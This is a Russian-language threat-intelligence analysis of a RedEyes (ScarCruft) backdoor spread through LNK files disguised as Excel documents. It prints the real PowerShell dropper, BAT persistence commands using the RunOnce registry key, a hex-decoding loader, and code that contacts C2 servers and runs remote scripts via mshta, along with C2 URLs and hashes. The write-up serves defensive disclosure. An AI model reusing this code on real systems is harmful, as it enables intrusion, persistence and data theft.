Центр экстренного реагирования на чрезвычайные ситуации AhnLab Security (ASEC) подтвердил, что вредоносная программа, ранее распространявшаяся в формате CHM, теперь распространяется в формате LNK. Эта вредоносная программа выполняет дополнительные скрипты, расположенные по определенному URL, через процесс mshta. Затем он получает команды с сервера угрожающего агента для выполнения дополнительных вредоносных действий.
RedEyes (ScarCruft) Backdoor
Атакующий распространяет подтвержденный LNK-файл на обычном сайте, загружая его вместе с вредоносным ПО в сжатом файле.
Вредоносный LNK-файл был загружен под именем 'REPORT.ZIP'. Подобно вредоносному ПО, выявленному в статье, этот файл имеет LNK, содержащий обычные данные документа Excel и код вредоносного скрипта.
Поэтому при выполнении файла 'Status Survey Table.xlsx.lnk' в папке %Temp% с помощью команд PowerShell создается и исполняется обычный документ 'Status Survey Table.xlsx' и вредоносный скрипт 'PMmVvG56FLC9y.bat'.
/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%\Status Survey Table.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = '%temp%\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^& %windir%\SysWOW64\cmd.exe /c $WH9lSPHOFI;'Status Survey Table.xlsx' выглядит как обычный документ Excel и выдает себя за корейскую государственную организацию следующим образом.
При выполнении параллельно созданного файла 'PMmVvG56FLC9y.bat' он копируется в папку '%appdata%\Microsoft\Protect\' как 'UserProfileSafeBackup.bat'. После этого он регистрируется в следующем реестре, чтобы обеспечить постоянное выполнение BAT-файла.
Путь к реестру: HKCU\ Software\Microsoft\Windows\CurrentVersion\RunOnce
Имя значения: BackupUserProfiles
Значение: C:\Windows\SysWOW64\cmd.exe /c %appdata%\Microsoft\Protect\UserProfileSafeBackup.bat
После регистрации в указанном реестре выполняется команда PowerShell в шестнадцатеричном формате внутри BAT-файла.
copy %~f0 "%appdata%\Microsoft\Protect\UserProfileSafeBackup.bat"
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:\Windows\SysWOW64\cmd.exe /c %appdata%\Microsoft\Protect\UserProfileSafeBackup.bat"
start /min C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command
"$m6drsidu ="$jWHmcU="""53746172742D536C656570202D<omitted>""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};
Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";
Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"При выполнении команды PowerShell происходит регистрация ключа Run, а также выполнение дополнительных скриптов, использующих mshta. Кроме того, регистрация в реестре может осуществляться по командам агента угроз. Ниже приведена часть команды PowerShell, представленная в шестнадцатеричном формате в коде BAT-файла.
Start-Sleep -Seconds 67;
$nvSklUbaQ = 1024 * 1024;
$yixgsFVy = $env:COMPUTERNAME + '-' + $env:USERNAME+'-SH';
$aWw = 'hxxp://75.119.136[.]207/config/bases/config.php' + '?U=' + $yixgsFVy;
$bLmoifqHwJxhE = $env:TEMP + '/KsK';
if (!(Test-Path $bLmoifqHwJxhE)) { New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name Olm -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 311714 2.2.2.2 || mshta hxxp://bian0151.cafe24[.]com/admin/board/1.html' -PropertyType String -Force;}Ниже приведены подтвержденные C2 и вредоносные URL:
- hxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH // Получает команды от агента угрозы
- hxxp://75.119.136.207/config/bases/config.php?R=[‘EOF’ encoded in base64] // Передача результатов выполнения команды
- hxxp://bian0151.cafe24[.]com/admin/board/1.html // Загрузка дополнительных кодов сценариев
Дополнительные коды скриптов (hxxp://bian0151.cafe24.com/admin/board/1.html), выполняемые через mshta, содержат команду PowerShell, обфусцированную в Base64, как показано ниже.
Декодированная команда PowerShell получает и обрабатывает команды от угрожающего агента по адресу hxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH. На рисунке 6 показана часть декодированной команды PowerShell.
Ниже перечислены команды и функции, которые могут быть выполнены.
| pcinfo | Сбор информации о ПК |
| drive | Сбор информации о дисках |
| clipboard | Сбор информации о содержимом буфера обмена |
| svc | Сбор служебной информации |
| process | Сбор информации о запущенных процессах |
| fileinfo | Собирает имена, размеры, даты последнего использования и полные пути для подфайлов в полученном пути |
| start | Выполнение полученной команды через cmd |
| plugin | Загрузка и выполнение дополнительных файлов через PowerShell |
| down | Загружает дополнительные файлы по полученному пути |
| up | Загружает файлы из полученного пути |
| regedit | Добавляет файлы в реестр |
| compress | Сжимает файлы |
Есть подозрение, что злоумышленник постоянно модифицирует код скрипта, поскольку команды, приведенные в табл. 1, отличаются от ранее идентифицированных. Поэтому, помимо подтвержденных на данный момент функциональных возможностей, могут выполняться и другие вредоносные действия.
Помимо LNK-файла, сжатые файлы 'KB_20230531.rar', 'attachment.rar' и 'hanacard_20230610.rar', идентифицированные на рис. 1 вместе с 'REPORT.ZIP', также содержат ранее идентифицированный вредоносный CHM-файл. Подобно описанному ранее LNK-файлу, этот CHM-файл представляет собой вредоносное ПО, использующее mshta для выполнения дополнительных скриптов, расположенных по определенным URL-адресам.
В связи с массовым распространением в последнее время вредоносных программ, использующих CHM- и LNK-файлы, пользователям следует проявлять повышенную осторожность. В случае с вредоносными LNK-файлами было замечено, что размер значительного их числа превышает 10 МБ. Поэтому пользователям следует воздержаться от выполнения больших LNK-файлов из неизвестных источников.
Indicators of Compromise
URLs
- http://75.119.136.207/config/bases/config.php
MD5
- 0eb8db3cbde470407f942fd63afe42b8
- 27f74072d6268b5d96d73107c560d852
- 2d444b6f72c8327d1d155faa2cca7fd7